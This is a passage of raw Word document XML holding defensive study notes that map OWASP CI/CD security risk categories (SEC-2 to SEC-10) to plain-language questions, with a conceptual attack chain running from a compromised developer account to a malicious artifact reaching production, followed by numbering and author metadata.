    <w:p w14:paraId="122C58A0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Flow/approval controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A50A274" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6"/>
    <w:p w14:paraId="12751C0D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C1E562" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>"Who am I and what can I do?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76899F17" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A921EE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>User identity &amp; platform permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B876295" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6"/>
    <w:p w14:paraId="03DDADAC" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C5428" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>"What can this pipeline/job access?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731576F8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1981EC47" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Pipeline/service-account permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28520DBA" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>And:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5594E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA00323" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Dependency is malicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A55504" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB6BAC" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Dependency Chain Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E6A92" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6"/>
    <w:p w14:paraId="27EB28A6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03833855" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Pipeline executes attacker-controlled code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14C80E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244B9D40" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Poisoned Pipeline Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC63C4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>And:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EBFC91" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50452084" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Secret itself is poorly handled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD39A1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B988884" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Credential Hygiene</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B9FE2D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6"/>
    <w:p w14:paraId="2B58F677" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SEC-9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF3FF36" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Artifact itself isn't properly verified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41927523" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">        ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA4943C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Artifact Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D79772" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A realistic attack chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D99522" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>A very useful way to understand how these categories can connect is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113AECFB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Attacker compromises developer account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2126E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9D71D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       SEC-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE1C25" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AA283" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Modifies pipeline/build configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B96B15" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DE942" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       SEC-4 (PPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA60B7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D4138" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Pipeline accesses excessive cloud privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9BDB08" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582EAC01" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       SEC-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118983FF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63999B1C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production credentials are exposed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E07A55" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1DDB4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       SEC-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74631F86" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD4F6B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Malicious artifact is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C798A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF696B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Artifact isn't properly verified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ABEFE2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091E8BEB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       SEC-9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EA6F8A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5F1AE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Malicious application reaches production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD54D17" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB63FE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>Poor visibility makes investigation difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6737CBAE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">             ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628DCC31" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       SEC-10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF68E9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP Top 10 isn't 10 completely separate problems</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>. They can form one attack chain across the CI/CD lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF46BAD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRDefault="00A54CB6"/>
    <w:sectPr w:rsidR="00A54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021"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2E0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8168C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="550A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83060"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00CC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D14D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4478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329CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4A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92FCF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1BA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8443B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D4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F7F23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9234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D6B5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB6C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97ACA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B22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E7964"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="679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E0E4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C312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074560">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1256205811">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1263369727">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1947468619">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1096941852">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="122504823">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="201331438">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1942447366">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1474249814">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1446971271">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="985355547">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2035498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B6"/>
    <w:rsid w:val="00777406"/>
    <w:rsid w:val="00A5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A593"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D70C7CC3-6218-4BB9-B96D-F20248D2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2007</Words>
  <Characters>11445</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>95</Lines>
  <Paragraphs>26</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Nandanwar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Akhilesh Nandanwar</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-16T18:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-16T18:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>